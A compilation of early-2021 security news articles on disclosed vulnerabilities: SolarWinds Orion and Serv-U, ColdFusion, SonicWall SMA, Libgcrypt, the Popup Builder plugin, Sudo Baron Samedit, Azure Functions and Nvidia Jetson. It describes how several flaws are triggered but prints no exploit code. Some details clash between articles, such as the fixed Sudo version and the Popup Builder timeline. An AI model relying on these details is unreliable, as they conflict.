SolarWinds Product Vulnerabilities Allow Hackers to Take Full Control of Systems
4.2.2021
Vulnerebility
Securityweek
Cybersecurity firm Trustwave on Wednesday reported that one of its researchers recently discovered several potentially serious vulnerabilities in products made by Texas-based IT management solutions provider SolarWinds.
SolarWinds was recently targeted in a sophisticated supply chain attack that resulted in thousands of organizations receiving malicious updates for the company’s Orion monitoring product, and a few hundred — ones that presented an interest to the attackers — getting other malware that may have given the hackers deep access into their networks.
Following the disclosure of the attack, Trustwave researchers decided to analyze SolarWinds products based on the Orion framework to see if they contain any vulnerabilities that could expose the company’s customers to attacks. They discovered two vulnerabilities in Orion and one in Serv-U FTP software.
“To the best of Trustwave’s knowledge, none of the vulnerabilities were exploited during the recent SolarWinds attacks or in any ‘in the wild’ attacks,” Trustwave said in a blog post.
The security holes were reported to SolarWinds in late December 2020 and early January 2021. The Orion vulnerabilities were patched on January 25 with the release of version 2020.2.4, and the Serv-U issue is expected to be patched on February 3.
One of the Orion vulnerabilities, tracked as CVE-2021-25275, is related to the exposure of credentials for the backend database. The credentials, discovered by researchers in a configuration file, allow access to the Microsoft SQL Server system, which in turn provides control over the Orion database. Once they can access this database, an attacker could steal information or add new users with administrator privileges.
While exploitation of this vulnerability requires the attacker to have at least limited access to the targeted system, Trustwave researchers also discovered a more serious security hole that can be exploited remotely, without authentication.
This Orion flaw, tracked as CVE-2021-25274, is a deserialization issue and it can be exploited by a remote, unauthenticated attacker to execute arbitrary code on the targeted system with elevated privileges, giving them complete control of the underlying operating system.
The Serv-U vulnerability, identified as CVE-2021-25276, can be exploited by an attacker who has local access to the targeted system — or who has logged in via RDP — to read, write or delete any file on the system.
“Following the recent nation-state attack against an array of American software providers, including SolarWinds, we have been collaborating with our industry partners and government agencies to advance our goal of making SolarWinds the most secure and trusted software company,” SolarWinds said in an emailed statement.
It added, “We have always been committed to working with our customers and other organizations to identify and remediate any vulnerabilities across our product portfolio in a responsible way. Today’s announcement aligns with this process.”
Trustwave says it plans on releasing proof-of-concept (PoC) code for these vulnerabilities only on February 9 in order to give SolarWinds customers more time to install the patches.
Weak ACLs in Adobe ColdFusion Allow Privilege Escalation
4.2.2021
Vulnerebility
Securityweek
A newly disclosed vulnerability in Adobe ColdFusion could be exploited by unprivileged users for the execution of arbitrary code with SYSTEM privileges.
The popular commercial web-application development platform uses the CFML scripting language and is mainly used for the creation of data-driven websites.
This week, Will Dormann, a security researcher with Carnegie Mellon University’s CERT Coordination Center (CERT/CC), revealed that the Adobe ColdFusion installer doesn’t create a secure access-control list (ACL) on the default installation directory.
Due to the lack of properly set ACL, any unprivileged user could create files in the platform’s directory structure, which leads to a privilege escalation security flaw.
An unprivileged user on a Windows computer, Dormann explains, could place a specially-crafted DLL file within the installation directory of Adobe ColdFusion, which would result in arbitrary code being executed with SYSTEM privileges. This type of attack is known as DLL hijacking.
Threat actors who have already established a foothold on a Windows machine running a vulnerable ColdFusion installation could target this vulnerability to execute malicious code with elevated privileges.
In the vulnerability note published on CERT/CC’s website, Dormann explains that mitigation steps for the security issue involve the use of the ColdFusion Server Auto-Lockdown installer.
“By default, ColdFusion does not configure itself securely. In order to secure ColdFusion with respect to service privileges, ACLs, and other attributes, the ColdFusion Server Auto-Lockdown installer must be installed in addition to installing ColdFusion itself,” he notes.
Mitigations vary depending on the ColdFusion version in use: while auto-lockdown installers are available for ColdFusion 2018 and ColdFusion 2021, users of ColdFusion 2016 will have to apply the changes that Adobe has detailed in the ColdFusion 2016 Lockdown Guide.
Contacted by SecurityWeek, Adobe has confirmed the vulnerability: “Adobe worked with the researcher who brought this matter to our attention and mitigation steps are included within the researcher’s note.”
ColdFusion has long been a target of threat actors, and Adobe has patched at least a handful of vulnerabilities already exploited in attacks, either on Patch Tuesday or with out-of-band updates.
Applying the mitigation steps for the newly discovered vulnerability as soon as possible will help users ensure their systems are not exposed to attacks.
3 New Severe Security Vulnerabilities Found In SolarWinds Software
4.2.2021
Vulnerebility
Thehackernews
Cybersecurity researchers on Wednesday disclosed three severe security vulnerabilities impacting SolarWinds products, the most severe of which could have been exploited to achieve remote code execution with elevated privileges.
Two of the flaws (CVE-2021-25274 and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows, said cybersecurity firm Trustwave in technical analysis.
None of the three security issues have been exploited in the unprecedented supply chain attack targeting the Orion Platform that came to light last December.
password auditor
The two sets of vulnerabilities in Orion and Serv-U FTP were
disclosed to SolarWinds on December 30, 2020, and January 4, 2021, respectively,
following which the company resolved the issues on January 22 and January 25.
It's highly recommended that users install the latest versions of Orion Platform and Serv-U FTP (15.2.2 Hotfix 1) to mitigate the risks associated with the flaws. Trustwave said it intends to release a proof-of-concept (PoC) code next week on February 9.
Complete Control Over Orion
Chief among the vulnerabilities uncovered by
Trustwave includes improper use of Microsoft Messaging Queue (MSMQ), which is
used heavily by the SolarWinds Orion Collector Service, thereby allowing
unauthenticated users to send messages to such queues over TCP port 1801 and
eventually attain RCE by chaining it with another unsafe deserialization issue
in the code that handles incoming messages.
"Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system," Trust researcher Martin Rakhmanov said.
The patch released by SolarWinds (Orion Platform 2020.2.4) addresses the bug
with a digital signature validation step that's performed on arrived messages to
ensure that unsigned messages are not processed further, but Rakhmanov cautioned
that the MSMQ is still unauthenticated and allows anyone to send messages to it.
The second vulnerability, also found in the Orion Platform, concerns the insecure manner in which credentials of the backend database (named "SOLARWINDS_ORION") is stored in a configuration file, resulting in a local, unprivileged user take complete control over the database, steal information, or even add a new admin-level user to be used inside SolarWinds Orion products.
Lastly, a flaw in SolarWinds Serv-U FTP Server 15.2.1 for Windows could allow any attacker that can log in to the system locally or via Remote Desktop to drop a file that defines a new admin user with full access to the C:\ drive, which can then be leveraged by logging in as that user via FTP and read or replace any file on the drive.
U.S. Department of Agriculture Targeted Using New SolarWinds Flaw
News of the
three vulnerabilities in SolarWinds products comes on the heels of reports that
alleged Chinese threat actors exploited a previously undocumented flaw in the
company's software to break into the National Finance Center, a federal payroll
agency inside the U.S. Department of Agriculture.
This flaw is said to be different from those that were abused by suspected Russian threat operatives to compromise SolarWinds Orion software that was then distributed to as many as 18,000 of its customers, according to Reuters.
In late December, Microsoft said a second hacker collective might have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems by taking advantage of an authentication bypass vulnerability in the Orion API to execute arbitrary commands.
SolarWinds issued a patch to address the vulnerability on December 26, 2020.
Last week, Brandon Wales, acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA), said nearly 30% of the private-sector and government agencies linked to the intrusion campaign had no direct connection to SolarWinds, implying that the attackers used a variety of ways to breach target environments.
The overlap in the twin espionage efforts notwithstanding, the campaigns are yet another sign that advanced persistent threat (APT) groups are increasingly focusing on the software supply chain as a conduit to strike high-value targets such as corporations and government agencies.
The trust and ubiquity of software such as those from SolarWinds or Microsoft make them a lucrative target for attackers, thus underscoring the need for organizations to be on the lookout for potential dangers stemming from relying on third-party tools to manage their platforms and services.
SonicWall Says 'a Few Thousand Devices' Impacted by Zero-Day Vulnerability
3.2.2021
Vulnerebility
Securityweek
SonicWall on Monday confirmed that its Secure Mobile Access (SMA) 100 series appliances are affected by a zero-day vulnerability that has apparently already been exploited in attacks.
SonicWall told SecurityWeek that a few thousand devices are exposed to attacks due to the zero-day vulnerability. The cybersecurity solutions provider says it’s working on developing patches and, in the meantime, it has shared some recommendations on how customers can protect their networks against potential attacks.
The company revealed on January 22 that it had identified a “coordinated attack on its internal systems” that was apparently launched by a highly sophisticated threat group that may have exploited zero-day vulnerabilities in some of the company’s secure remote access products.
SonicWall initially said its NetExtender VPN client and SMA 100 series products may be impacted, but it later determined that the NetExtender VPN client, SonicWall firewalls, SMA 1000 series devices, and SonicWave APs are not affected.
Only SMA 100 series devices remained under investigation, but an update shared on January 29 said the company could still not confirm the existence of a zero-day vulnerability affecting these products.
On Sunday, January 31, however, cybersecurity firm NCC Group reported discovering a possible candidate for the vulnerability, for which the company had seen “indiscriminate” attempts to exploit in the wild.
Following NCC’s report, SonicWall on Monday confirmed the existence of a zero-day flaw affecting SMA 100 series 10.x physical and virtual devices, specifically SMA 200, SMA 210, SMA 400, SMA 410 and SMA 500v. The vendor said firewalls, 1000 series appliances and VPN clients do not appear to be affected, and neither are SMA 100 series devices running a firmware version prior to 10.x. A CVE identifier has yet to be assigned for this vulnerability.
SonicWall hopes to release a patch by the end of the day on February 2. In the meantime, customers can prevent potential attacks by enabling multi-factor authentication and changing passwords for accounts that used affected SMA appliances, by blocking access to the appliances on the firewall, by shutting down impacted appliances, or by downgrading the firmware on the device to version 9.x.
Shortly after SonicWall disclosed the breach, some anonymous individuals claimed the company was hit by ransomware and the attackers had stolen source code and customer data, but none of those claims have been confirmed. At least some of the claims seen by SecurityWeek at the time seemed questionable.
Google Discloses Severe Bug in Libgcrypt Encryption Library—Impacting Many
Projects
1.2.2021
Vulnerebility
Thehackernews
A "severe" vulnerability in GNU Privacy Guard (GnuPG)'s Libgcrypt encryption software could have allowed an attacker to write arbitrary data to the target machine, potentially leading to remote code execution.
The flaw, which affects version 1.9.0 of libgcrypt, was discovered on January 28 by Tavis Ormandy of Project Zero, a security research unit within Google dedicated to finding zero-day bugs in hardware and software systems.
No other versions of Libgcrypt are affected by the vulnerability.
"There is a heap buffer overflow in libgcrypt due to an incorrect assumption in the block buffer management code," Ormandy said. "Just decrypting some data can overflow a heap buffer with attacker controlled data, no verification or signature is validated before the vulnerability occurs."
GnuPG addressed the weakness almost immediately within a day after disclosure, while urging users to stop using the vulnerable version. The latest version can be downloaded here.
The Libgcrypt library is an open-source cryptographic toolkit offered as part of GnuPG software suite to encrypt and sign data and communications. An implementation of OpenPGP, it's used for digital security in many Linux distributions such as Fedora and Gentoo, although it isn't as widely used as OpenSSL or LibreSSL.
According to GnuPG, the bug appears to have been introduced in 1.9.0 during its development phase two years ago as part of a change to "reduce overhead on generic hash write function," but it was only spotted last week by Google Project Zero.
Thus all an attacker needs to do to trigger this critical flaw is to send the library a block of specially-crafted data to decrypt, thus tricking the application into running an arbitrary fragment of malicious code embedded in it (aka shellcode) or crash a program (in this case, gpg) that relies on the libgcrypt library.
"Exploiting this bug is simple and thus immediate action for 1.9.0 users is required," Libgcrypt author Werner Koch noted. "The 1.9.0 tarballs on our FTP server have been renamed so that scripts won't be able to get this version anymore."
WordPress Pop-Up Builder Plugin Flaw Plagues 200K Sites
30.1.2021 Vulnerebility Threatpost
The flaw could have let attackers send out custom newsletters and delete newsletter subscribers from 200,000 affected websites.
Developers of a plugin, used by WordPress websites for building pop-up ads for newsletter subscriptions, have issued a patch for a serious flaw. The vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.
The plugin in question is Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter, from developer Sygnoos. The plugin has been installed on 200,000 WordPress websites. Versions 3.71 and below are affected by the vulnerability (a fix has been issued in version 3.72; and the latest version is 3.73).
“The only requirement for exploitation is that the user is logged in and has access to the nonce token,” said researchers with WebArx on Friday. “It is affecting methods which in turn could cause damage to the reputation and security status of the site.”
The issue stems from a lack of authorization for AJAX methods in the plugin. AJAX is a set of web-development techniques that are used to create web applications; the AJAX method is used to perform an AJAX request.
In this case, the AJAX method does not check the capability of the user. Because of this, the AJAX endpoint, intended to only be accessible to administrators, actually also could allow subscriber-level users to perform a number of actions that can compromise the site’s security, researchers said. A subscriber is a user role in WordPress, usually the with very limited capabilities, including logging into the website and leaving comments.
One vulnerable method is related to the importConfigView.php file. Without authorization, attackers could utilize this method to import a list of subscribers from a remote URL, which is then handled in the method saveImportedSubscribers. Attackers could also leverage the importConfigView.php file to import malicious files from the remote URL. The only limitation is that if it is not a legitimate CSV file (files designed to easily export data and import it into other programs), the file will only output the first line of the given file, said researchers. Another vulnerable method allows attackers to send out a newsletter using newsletter data taken from the $_POST[‘newsletterData’] user input variable.
“This can also include custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers,” said researchers.
Researchers noted that a nonce token is checked – but because this nonce token is sent to all users regardless of their capabilities, any user can execute the vulnerable AJAX methods as long as they pass the nonce token. A nonce is a cryptographic number, used by authentication protocols to protect private communications by preventing replay attacks.
Researchers discovered the flaw on Dec. 2, 2020, and notified the developer on the same day. A patch was released for the flaw on Jan. 22, 2021 in version 3.72 of the plugin. In this version, the AJAX actions now have an authorization check barring attackers from exploiting the flaw.
WordPress plugins have been found to have serious vulnerabilities. Earlier in January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Experts addressed flaws in Popup Builder WordPress plugin
30.1.2021
Vulnerebility
Securityaffairs
Multiple issues in WordPress ‘Popup Builder’ Plugin could be exploited by
hackers to perform various malicious actions on affected websites.
Developers
behind the “Popup Builder – Responsive WordPress Pop up – Subscription &
Newsletter” WordPress plugin have recently addressed multiple vulnerabilities
that can be exploited to perform various malicious actions on affected websites.
The plugin has over 200,000 active installations to date, it allows WordPress site owners to create, customize, and manage promotion modal popups.
Experts from the security firm WebARX states that the flaw in the “Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter” plugin is caused by the lack of authorization in most AJAX methods.
“The authorization issues in the plugin are caused due to many of the AJAX methods not checking the capability of the user. A method to check the capability of the user is present in the plugin but was not used in these methods.” reads the post published by WebARX.
“A nonce token on the other hand is checked but since this nonce token is sent to all users regardless of their capabilities, any user can execute the vulnerable AJAX methods as long as they pass the nonce token.”
The lack of authorization could allow to send out newsletters with any content, for local file inclusion (but limited to first-line), to import or delete subscribers, and perform other activities.
The plugin fails to check a nonce token, and users with any capability can execute the vulnerable AJAX methods.
The experts provided information about some of the vulnerable methods but did not include details about all the affected functions.
One of the vulnerable methods allows users to import a list of subscribers from a remote URL, while another could be abused by an authenticated user to send out newsletters with “custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers.”
The flaws could be exploited by a logged-in user with access to the nonce token.
“However, it is affecting methods which in turn could cause damage to the
reputation and security status of the site.” concludes the report.
Below the timeline for the flaws:
2nd December 2020 – We discovered the
vulnerability and released a virtual patch to all WebARX customers.
2nd
December 2020– We reported the issue to the developer of the Popup Builder
plugin.
3rd December 2020 – The developer replied and started working on a
fix.
8th December 2020 – The developer released version 3.71 which only added
an authorization check to the AJAX method to send newsletters, not all of them.
4th of January 2021 – Asked the developer for an update regarding progress on a
new fixed version.
12th of January 2021 – No response so far, asked the
developer for an update again.
22nd of January 2021 – Version 3.72 was
released which contains the proper fixes, the AJAX actions now have an
authorization check.
28th of January 2021 – Published the article.
Many WordPress Sites Affected by Vulnerabilities in 'Popup Builder' Plugin
29.1.2021
Vulnerebility
Securityweek
Multiple vulnerabilities patched recently in the popular WordPress plugin Popup Builder could be exploited to perform various malicious actions on affected websites.
With over 200,000 installations to date, “Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter” is a plugin that helps WordPress site owners create, customize, and manage promotion modal popups.
Discovered by researchers at website security company WebARX, the recently addressed issues are caused by the lack of authorization on most AJAX methods, and impact all Popup Builder versions up to 3.71.
The missing authorizations create security flaws that could be leveraged to send out newsletters with any content, for local file inclusion (but limited to first-line), to import or delete subscribers, and perform other actions as well.
The bugs, WebARX explains, exist because the AJAX methods fail to check the capability of the user, although a method to perform the check has been implemented in the plugin.
The plugin does perform the check of a nonce token, and any user – regardless of capability – who can pass the check can execute the vulnerable AJAX methods, as the nonce token is sent to all users.
WebARX’ researchers have detailed some of the vulnerable methods, but refrained from publishing information on all of them, given that a large number of methods are affected.
One of the vulnerable methods, they reveal, could be abused by an authenticated user to send out newsletters with “custom email body content, email sender, and several other attributes that will essentially allow a malicious user to send out emails to all subscribers.”
To exploit the vulnerability, a user would need to be logged in and to have access to the nonce token, the researchers say.
Some of the affected methods, they also reveal, “could cause damage to the reputation and security status of the site.”
The vulnerabilities were reported to the plugin’s developer in February 2020. An incomplete fix was pushed out in August 2020, with the release of version 3.71 of the plugin, while a proper fix was made available last week, with the release of version 3.72.
Sudo Bug Gives Root Access to Mass Numbers of Linux Systems
28.1.2021 Vulnerebility Threatpost
Qualys said the vuln gives any local user root access to systems running the most popular version of Sudo.
A doozy of a bug that could allow any local user on most Linux or Unix systems to gain root access has been uncovered — and it had been sitting there for a decade, researchers said.
The bug was found in Sudo, a utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user. Qualys researchers named the vulnerability “Baron Samedit,” tracked as CVE-2021-3156. They said the bug popped into the Sudo code back in July 2011.
“Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit, and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2),” the report said. “Other operating systems and distributions are also likely to be exploitable.”
The authors of Sudo have released a patched update, Sudo version 1.5.5p2.
“Not all Unix-like systems use the same implementation of Sudo, but this vulnerability is in the implementation distributed from https://www.sudo.ws/sudo.html (the Sudo main page) and is a widely used implementation,” David A. Wheeler from the Linux Foundation told Threatpost.
But the news on the Sudo bug isn’t all terrible.
Locals Only: The Good News on the Sudo Bug
“One piece of good news: This is
not remotely exploitable [without authentication],” Wheeler added. “An attacker
must already be able to run programs on the vulnerable computer before this
vulnerability can be used.”
Jerry Gamblin, director of security research at Kenna Security, agreed with Wheeler that while the bug is a dangerous vulnerability, the possibility for rampant attacks is low.
“It is important to level-set that to exploit this vulnerability, a bad actor would need remote (SSH) or direct access to a vulnerable Linux machine,” Gamblin told Threatpost. “While it is a vulnerability that should be patched quickly, it does require a certain level of preexisting access, which makes widespread exploitation unlikely.”
That said, malicious insiders or attackers who have achieved initial-stage access to a Linux environment are still perfectly capable of exploiting the issue. Linux botnets are also an attack vector. The recently discovered FreakOut malware, for instance, targets Linux devices with specific products that have not been patched against various flaws. It adds compromised devices to a botnet that can then be used for multiple purposes, such as pushing additional malware or carrying out denial-of-service attacks. It also has brute-force abilities using hard-coded credentials to infect other network devices.
“I expect this CVE to have a CVSS score that falls in the range of 6 to 8. It is a local attack that requires low complexity and affects integrity and confidentiality,” Gamblin said. “The risk for this vulnerability would be significantly higher if you offer terminal access to low privileged users, such as in an educational environment or an environment in which access is given to employees to run or monitor individual tasks.”
Sudo, a Double-Bug Perfect Storm
Here’s how the vuln works: Specifically, the
bug is a heap-based buffer overflow in Sudo, which lets any local user trick it
into running in “shell” mode.
Sudo authors explained in a Tuesday advisory that when Sudo is running in shell mode, “it escapes special characters in the command’s arguments with a backslash.” Then, a policy plug-in removes any escape characters before deciding on the Sudo user’s permissions.
But it’s not just a single bug which exposed these systems, it’s actually the combination of two bugs working in tandem in Sudo that makes the exploitation possible, the authors explained.
“A bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character,” the Sudo authors explained. “Under normal circumstances, this bug would be harmless since Sudo has escaped all the backslashes in the command’s arguments.”
But another vuln, to which the CVE is assigned, was lurking in Sudo that made exploitation a threat.
“However, due to a different bug, this time in the command-line parsing code, it is possible to run “sudoedit” with either the -s or -i options, setting a flag that indicates shell mode is enabled,” according to the alert. “Because a command is not actually being run, Sudo does not escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. This inconsistency is what makes the bug exploitable.”
Linux/Unix Buffer Overflow
Technically speaking, the vulnerable code
overflows the heap-based buffer “user_args” which gives attackers control over
the size and contents of the overflow and allows them to change bytes in the
overflow, according to Qualys.
“For example, on an amd64 Linux, the following command allocates a 24-byte “user_args” buffer (a 32-byte heap chunk) and overwrites the next chunk’s size field with “A=a\0B=b\0” (0x00623d4200613d41), its fd field with “C=c\0D=d\0” (0x00643d4400633d43), and its bk field with “E=e\0F=f\0″ (0x00663d4600653d45):” the report said.
Qualys researchers published a proof-of-concept (PoC) video:
Wheeler added that anyone running the system should implement the patched update as soon as possible.
“Another piece of good news is that this is easily fixed and updated; fixing this shouldn’t change how it works in the normal case,” Wheeler added. “So you should immediately update to the fixed version.”
Heap-based buffer overflow in Linux Sudo allows local users to gain root
privileges
28.1.2021
Vulnerebility
Securityaffairs
CVE-2021-3156 Sudo vulnerability has allowed any local user to gain root
privileges on Unix-like operating systems without authentication.
Sudo is one
of the most important, powerful, and commonly used utilities that comes as a
core command pre-installed on macOS and almost every UNIX or Linux-based
operating system.
sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.
The Sudo CVE-2021-3156 vulnerability, dubbed Baron Samedit, could have been exploited by any local user to gain root privileges on Unix-like operating systems without requiring authentication (i.e., the attacker does not need to know the user’s password).
The privilege escalation issue is a heap-based buffer overflow that was discovered by security researchers from Qualys.
The experts reported the vulnerability on January 13th, but it was publicly disclosed only this week to give the development teat the time to address the issue.
“Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via “sudoedit -s” and a command-line argument that ends with a single backslash character:” reads the description published by Mitre.
The vulnerability is caused by Sudo incorrectly handling backslashes in the arguments.
The vulnerability was introduced in July 2011 (commit 8255ed69), and affects all versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1, in their default configuration.
“When sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command’s arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn’t expect the escape characters) if the command is being run in shell mode.” states the advisory published by the Sudo team.
“A bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character. Under normal circumstances, this bug would be harmless since sudo has escaped all the backslashes in the command’s arguments. However, due to a different bug, this time in the command line parsing code, it is possible to run sudoedit with either the -s or -i options, setting a flag that indicates shell mode is enabled. Because a command is not actually being run, sudo does not escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. This inconsistency is what makes the bug exploitable.”
Qualys researchers developed three exploits for this flaw that allowed them to achieve full root privileges on major Linux distributions, including Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Experts pointed out that the CVE-2021-3156 exploits could also work on other distributions.
Below a video PoC for the CVE-2021-3156 vulnerability can be exploited is
embedded below.
The Sudo contributors addressed the flaw with the release of the 1.9.5p2 version.
In February, 2020, the security expert Joe Vennix from Apple discovered an important vulnerability in ‘sudo‘ utility, tracked as CVE-2019-18634, that allows non-privileged Linux and macOS users to run commands as Root.
In October 2019. experts discovered another security policy bypass issue, tracked as CVE-2019-14287, that was disclosed in the Sudo utility installed as a command on almost every Linux and Unix system.
Ten-Year-Old Sudo Vulnerability Gives Root Privileges on Host
28.1.2021
Vulnerebility
Securityweek
A major security hole in the Sudo utility could be abused by unprivileged users to gain root privileges on the vulnerable host, Qualys reports.
Designed to allow users to run programs with the security privileges of another user (by default superuser, hence the name, which is derived from ‘superuser do’), Sudo is present in major Unix- and Linux-based operating systems out there.
Tracked as CVE-2021-3156, the recently identified vulnerability, which Qualys refers to as “Baron Samedit,” was introduced in July 2011, and can be exploited to gain root privileges using a default Sudo configuration.
This means that an attacker able to compromise a low-privileged account on the machine could abuse the vulnerability to gain root access.
All legacy versions of Sudo, from 1.8.2 to 1.8.31p2, as well as the utility’s stable releases from 1.9.0 to 1.9.5p1 are affected, in their default configuration.
Qualys’ security researchers said they came up with exploit variants to obtain full root privileges on Linux distributions such as Debian 10 (Sudo 1.8.27), Fedora 33 (Sudo 1.9.2), and Ubuntu 20.04 (Sudo 1.8.31), but noted that other operating systems and distributions that rely on Sudo might be affected as well.
The bug was reported to the Sudo team a couple of weeks ago, and patches were rolled out today. Sudo v1.9.5p2 resolves the vulnerability.
“Given the breadth of the attack surface for this vulnerability, Qualys recommends users apply patches for this vulnerability immediately,” the security researchers note.
Qualys, which provides an in-depth technical analysis of the vulnerability, has published a proof-of-concept video to demonstrate how the issue can be exploited.
Last year, a buffer overflow in the pwfeedback option in Sudo was also found to provide attackers with elevated privileges on an affected machine. Several years ago, another privilege escalation bug was addressed in the popular utility.
New Docker Container Escape Bug Affects Microsoft Azure Functions
28.1.2021
Vulnerebility
Thehackernews 
Cybersecurity researcher Paul Litvak today disclosed an unpatched vulnerability in Microsoft Azure Functions that could be used by an attacker to escalate privileges and escape the Docker container used for hosting them.
The findings come as part of Intezer Lab's investigations into the Azure compute infrastructure.
Following disclosure to Microsoft, the Windows maker is said to have "determined that the vulnerability has no security impact on Function users, since the host itself is still protected by another defense boundary against the elevated position we reached in the container host."
Azure Functions, analogous to Amazon AWS Lambda, is a serverless solution that allows users to run event-triggered code without having to provision or manage infrastructure explicitly while simultaneously making it possible to scale and allocate compute and resources based on demand.
By incorporating Docker into the mix, it makes it possible for developers to easily deploy and run Azure Functions either in the cloud or on-premises.
Since the trigger code is an event (e.g., an HTTP request) that is configured to
call an Azure Function, the researchers first created an HTTP trigger to gain a
foothold over the Function container, using it to find sockets belonging to
processes with "root" privileges.
From there, one such privileged process associated with a "Mesh" binary was identified to contain a flaw that could be exploited to grant the "app" user that runs the above Function root permissions.
While the Mesh binary in itself had little to no documentation to explain its purpose, Intezer researchers found references to it in a public Docker image, which they used to reverse engineer and achieve privilege escalation.
In the final step, the extended privileges assigned to the container (using the "--privileged" flag) were abused to escape the Docker container and run an arbitrary command on the host.
Intezer has also released a proof-of-concept (PoC) exploit code on GitHub to probe the Docker host environment.
"Instances like this underscore that vulnerabilities are sometimes out of the cloud user's control," Intezer Labs researchers said. "Attackers can find a way inside through vulnerable third-party software.
"It's critical that you have protection measures in place to detect and terminate when the attacker executes unauthorized code in your production environment. This Zero Trust mentality is even echoed by Microsoft."
Nvidia Squashes High-Severity Jetson DoS Flaw
27.1.2021 Vulnerebility Threatpost
If exploited, the most serious of these flaws could lead to a denial-of-service condition for Jetson products.
Nvidia has patched three vulnerabilities affecting its Jetson lineup, which is a series of embedded computing boards designed for machine-learning applications, in things like autonomous robots, drones and more. A successful exploit could potentially cripple any such gadgets leveraging the affected Jetson products, said Nvidia.
If exploited, the most serious of these flaws could lead to a denial-of-service (DoS) condition for affected products. The flaw (CVE-2021-1070) ranks 7.1 out of 10 on the CVSS scale, making it high-severity. It specifically exists in the Nvidia Linux Driver Package (L4T), the board support package for Jetson products.
Nvidia L4T contains a glitch in the apply_binaries.sh script. This script is used to install Nvidia components into the root file system image. The script allows improper access control, which may lead to an unprivileged user being able to modify system device tree files. Device trees are a data structure of the hardware components of a particular computer, which allow an operating system’s kernel to use and manage those components, including the CPU, memory, and peripherals.
Access to a device tree file could allow an attacker to launch a DoS attack. Further details about the flaw – including what an attacker needs to exploit it – were not disclosed. The issue was discovered by programmer Michael de Gans.
All versions prior to L4T release r32.5 are affected; a patch is available in L4T release r32.5. Specific Jetson products affected include the Jetson TX1 and TX2 series; which are two low-power embedded computing boards that carry a Nvidia Tegra processor and are specifically designed for accelerating machine learning in systems. Also affected are the Jetson AGX Xavier series, a developer kit that’s essentially an artificial intelligence computer for autonomous machines; the Jetson Xavier NX developer kit; and the Jetson Nano and Jetson Nano 2GB developer kits.
A drone with Nvidia Jetson TX1
The other two are medium-severity flaws (CVE‑2021‑1069 and CVE‑2021‑1071), which were uncovered in the Nvidia Tegra’s kernel driver. This is code that allows the kernel to talk to the hardware devices that the system-on-a-chip (SoC) is in.
CVE‑2021‑1069 exists in NVHost, a software host that’s part of Nvidia Driver Helper Service. NVHost allows a variable to be null, which may lead to a null pointer dereference and unexpected reboot, ultimately leading to data loss, according to Nvidia.
CVE‑2021‑1071 meanwhile exists in the INA3221 driver, an on-board power monitor that monitors the voltage and current of certain rails. The flaw enables improper access control, which may lead to unauthorized users gaining access to system power usage data. This can lead to information disclosure.
It’s only the latest set of patches to be released by Nvidia this month. Last week, Nvidia newly disclosed three security vulnerabilities in the NVIDIA Shield TV, which could allow denial of service, escalation of privileges and data loss. Earlier in January, Nvidia patched flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its first security update of 2021. An updated security advisory now includes the availability of patched Linux drivers for the Tesla line of GPUs, affecting CVE-2021-1052, CVE-2021-1053 and CVE-2021-1056.
SonicWall Breach Stems from ‘Probable’ Zero-Days
26.1.2021
Vulnerebility
Threatpost
The security vendor is investigating potential zero-day vulnerabilities in its Secure Mobile Access (SMA) 100 series.
SonicWall is investigating “probable” zero-day flaws in its remote access security products that have been targeted by “highly-sophisticated” attackers. The company says it is investigating the attack and will update customers within 24 hours.
The security company said it is currently investigating its Secure Mobile Access (SMA) 100 series hardware for potential vulnerabilities linked to a reported cyberattack. SMA 100 is a gateway for small- and medium-sized businesses that lets authorized users access resources remotely. SMA 100 also gives system administrators visibility into remote devices that are connecting to the corporate network – and grants endpoints access based on corporate policies.
“Recently, SonicWall identified a coordinated attack on its internal systems by highly sophisticated threat actors exploiting probable zero-day vulnerabilities on certain SonicWall secure remote access products,” according to SonicWall, which first alerted the public of the attack on Friday evening.
SonicWall said current SMA 100 series customers may continue to use NetExtender for remote access with the SMA 100 series, as it has determined that this use case is not susceptible to exploitation. NetExtender is SonicWall’s VPN client for Windows and Linux, and allows customers to connect to SMA 100 for secure access to their company’s network.
However, “we advise SMA 100 series administrators to create specific access rules or disable Virtual Office and HTTPS administrative access from the Internet while we continue to investigate the vulnerability,” according to SonicWall.
Organizations that utilize SMA 100 series products should also use a firewall to only allow SSL-VPN connections to the SMA appliance from known or whitelisted IPs or configure whitelist access on the SMA directly itself, SonicWall recommends.
